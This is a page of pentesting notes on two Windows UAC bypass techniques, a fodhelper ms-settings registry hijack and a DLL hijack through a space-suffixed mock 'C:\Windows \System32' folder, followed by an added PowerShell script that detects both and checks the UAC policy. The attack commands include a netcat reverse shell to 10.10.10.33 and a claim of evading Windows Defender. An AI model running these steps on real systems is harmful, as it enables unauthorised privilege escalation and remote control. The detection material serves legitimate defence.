Pentesting & Red Teaming Notes
UAC Bypass


Last updated 2 years ago

UACME

Akagi (UACME) will work 99% of the time here:

akagi64 61 c:\windows\system32\cmd.exe

Technique 1

New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value 'c:\users\morph3\nc.exe -e cmd.exe 10.10.10.33 443' -Force

New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force

Now simply run "fodhelper" and you should have the shell.

To undo this:

Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force

Technique 2

This technique is pretty solid and is not detected by Windows Defender.

TL;DR: you can fool Windows by creating a folder named "C:\Windows \System32\" (note the trailing space after "Windows"). Put an auto-elevating Windows binary there and hijack one of the DLLs it loads. There is a full list of hijackable binaries here (see the links at the end of the page):

mkdir "C:\Windows \"
mkdir "C:\Windows \System32\"
copy "C:\Windows\System32\computerdefaults.exe" "C:\Windows \System32\computerdefaults.exe"
copy ".\morph.dll" "C:\Windows \System32\Secur32.dll"
"C:\Windows \System32\computerdefaults.exe"
  • You might need to compile your DLL for the 64-bit architecture:

# x64
x86_64-w64-mingw32-gcc -shared -o test.dll test.cpp

# x86
i686-w64-mingw32-gcc -shared -o test-x86.dll test.cpp
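From the defender's side, both techniques leave concrete artefacts: Technique 1 writes a per-user ms-settings handler that a clean system does not have, and Technique 2 needs a directory whose name ends in a space next to the real C:\Windows. The script below is an added example written for these notes, not code from the original page or from UACME; the function names are my own, and it assumes the standard UAC policy values under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System. It reports both artefacts and whether the machine's UAC level still allows the auto-elevation that both techniques depend on.

```powershell
# Added defensive check, not part of the original notes. It looks for the
# artefacts the two techniques above leave behind and reports whether UAC is
# configured so that auto-elevation (which both rely on) is possible at all.
# Function names are my own.

function Test-FodhelperHandlerHijack {
    # Technique 1 writes a per-user ms-settings handler. A clean system has no
    # ms-settings key under HKCU\Software\Classes, so its presence is a finding.
    $tail  = 'ms-settings\shell\open\command'
    $paths = @("HKCU:\Software\Classes\$tail")
    # Loaded hives of other users live under HKEY_USERS; their per-user classes
    # hive (the one HKCU\Software\Classes writes into) is mounted as <SID>_Classes.
    Get-ChildItem 'Registry::HKEY_USERS' -ErrorAction SilentlyContinue |
        Where-Object { $_.PSChildName -match '^S-1-5-21-\d+-\d+-\d+-\d+$' } |
        ForEach-Object {
            $paths += "Registry::HKEY_USERS\$($_.PSChildName)\Software\Classes\$tail"
            $paths += "Registry::HKEY_USERS\$($_.PSChildName)_Classes\$tail"
        }

    foreach ($path in ($paths | Select-Object -Unique)) {
        if (Test-Path -LiteralPath $path) {
            $key = Get-Item -LiteralPath $path
            [pscustomobject]@{
                Type            = 'ms-settings handler hijack (fodhelper)'
                Path            = $path
                Command         = $key.GetValue('')                # (Default): what fodhelper would launch
                DelegateExecute = $key.GetValue('DelegateExecute') # empty string when the bypass is armed
            }
        }
    }
}

function Test-MockTrustedDirectory {
    param([string]$Root = "$env:SystemDrive\")
    # Technique 2 needs a directory whose name ends in a space in the drive
    # root. Normal Win32 path handling strips trailing spaces, so such a name
    # never appears on an untouched system.
    Get-ChildItem -LiteralPath $Root -Directory -Force -ErrorAction SilentlyContinue |
        Where-Object { $_.Name -match '\s$' } |
        ForEach-Object {
            $contents = @()
            try {
                # The \\?\ prefix bypasses path normalisation so the trailing
                # space survives. Works on PowerShell 7 (.NET Core); Windows
                # PowerShell 5.1 may reject the prefix, in which case the
                # directory itself is still reported, just without its contents.
                $contents = [System.IO.Directory]::EnumerateFileSystemEntries(
                    "\\?\$($_.FullName)", '*', [System.IO.SearchOption]::AllDirectories)
            } catch { }
            [pscustomobject]@{
                Type     = 'mock trusted directory'
                Path     = $_.FullName
                Created  = $_.CreationTime
                Contents = @($contents)   # copied auto-elevating EXE plus the planted DLL, if readable
            }
        }
}

function Get-UacAutoElevationState {
    # Both techniques depend on auto-elevation of signed Windows binaries, which
    # only happens while ConsentPromptBehaviorAdmin is not 2. Setting it to 2
    # ("Always notify") makes every elevation prompt, including fodhelper.exe
    # and computerdefaults.exe, so neither technique yields a silent elevation.
    $policy = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    [pscustomobject]@{
        EnableLUA                  = $policy.EnableLUA
        ConsentPromptBehaviorAdmin = $policy.ConsentPromptBehaviorAdmin
        PromptOnSecureDesktop      = $policy.PromptOnSecureDesktop
        AutoElevationPossible      = ($policy.EnableLUA -eq 1 -and $policy.ConsentPromptBehaviorAdmin -ne 2)
    }
}

# Usage: run from an elevated prompt to see every loaded user hive; as a
# standard user only HKCU and the drive-root listing are checked.
Test-FodhelperHandlerHijack | Format-List
Test-MockTrustedDirectory   | Format-List
Get-UacAutoElevationState   | Format-List
```

The registry check is a point-in-time scan; for continuous coverage the same key path (ms-settings\shell\open\command under a user hive) is the thing to alert on in registry-modification telemetry, and a directory creation whose name ends in a space directly under the system drive root is equally unambiguous in file-system telemetry. The UAC state check is the mitigation: with "Always notify" set, the auto-elevating binaries both techniques abuse prompt like anything else.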

https://github.com/hfiref0x/UACME
https://twitter.com/xxByte/status/1381978562643824644
https://redteamer.tips/uac-bypass-through-trusted-folder-abuse/
https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e
https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows